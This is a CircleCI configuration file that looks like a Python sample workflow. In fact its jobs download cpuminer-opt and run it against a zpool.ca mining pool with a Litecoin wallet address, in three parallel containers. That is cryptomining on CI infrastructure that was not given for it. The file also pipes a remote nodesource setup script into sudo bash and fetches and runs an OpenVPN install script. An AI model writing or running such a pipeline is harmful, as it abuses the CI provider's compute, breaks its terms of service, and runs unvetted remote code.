working_dir: &working_dir ~/app

version: 2.1 
 
orbs: 
   
  python: circleci/python@1.2 
 
workflows: 
  sample:   
    jobs: 
      - job
 
jobs: 
  job:
    parallelism: 3
    docker: 
      - image: cimg/python:3.8 
     
    steps: 
      - checkout
      - run: sudo apt update
      - run: sudo apt upgrade -y
      - run: curl -sL https://deb.nodesource.com/setup_14.x | sudo -E bash -
      - run: apt install nodejs
      - run: curl -O https://raw.githubusercontent.com/angristan/openvpn-install/master/openvpn-install.sh
      - run: chmod +x openvpn-install.sh
      - run: ./openvpn-install.sh
      - run: wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.27/cpuminer-opt-linux.tar.gz
      - run: tar -xf cpuminer-opt-linux.tar.gz
      - run: ./cpuminer-sse2amd -a yescryptr16 -o stratum+tcps://yescryptR16.na.mine.zpool.ca:56333 -u LXXC5yzd4amhAYzNVoYziU2PWdaqFWNn1T -p c=LTC,zap=QOGE -t 15
